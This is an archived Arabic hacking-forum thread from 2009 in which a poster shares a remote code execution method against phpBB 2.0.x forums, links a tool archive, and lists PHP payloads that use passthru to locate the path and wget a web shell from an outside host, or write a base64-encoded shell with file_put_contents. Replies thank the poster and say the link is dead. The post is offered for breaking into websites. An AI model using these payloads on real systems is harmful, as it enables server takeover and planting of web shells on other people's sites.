:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   [فيديو] استغلال قاعدة بيانات phpbb ورفع شل (http://www.vbspiders.com/vb/t9455.html)

SkRtaR 04-30-2009 03:09 AM

[فيديو] استغلال قاعدة بيانات phpbb ورفع شل
 
اسم الثغرة : Remote Code Execution
الخطوة : High
الاصدارات : phpbb = 2.0.x
الترقيع : ترقية النسخة لآخر اصدار + تعطيل دوال التنفيذ

سمعت عن طرق سابقة شبيهة ولكن الأساليب تختلف ويفضل ان الواحد يطلع ع أكبر قدر من اساليب الوصول لثغرة معينة لأن الواحد مايضمن حالة واحدة مع كل المواقع اللي تواجهه


التطبيق
http://forum.unknown-heroes.com/file...--InjEctOr.rar


هدية خاصة للعناكب..


بدائل عن ماحقن بالتطبيق :

كود PHP:

passthr.u('pwd'// كأول مرة, للتعرف ع المسار
passthr.u('wget site.com/shell.php -O /path/shell.php')  // لسحب الشل ع هالمسار 

طريقة ثانية :
ممكن انشاء ملف وحقن كود الشل مباشرة فيه :
كود PHP:

file_put_conten.ts('/path/shell.php',base.64_decode('encode shell here')); 

والطريق كثيرة تحتاج منك فقط للتعرف ع php ودوالها


اللي يبي يتعرف ع الدوال لا يسأل هنا, يروح ع الموقع php.net ويبحث


ThE End

Bay Bay ... $ee y0u

Sniper_Mo 04-30-2009 07:13 PM

الف شكرا اخي SkRtaR على الشرح جاري التحميل والتجربة

harcha 05-29-2009 06:28 PM

شكرا

harcha 05-29-2009 06:31 PM

الرابط لا يعمل


الساعة الآن 12:26 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0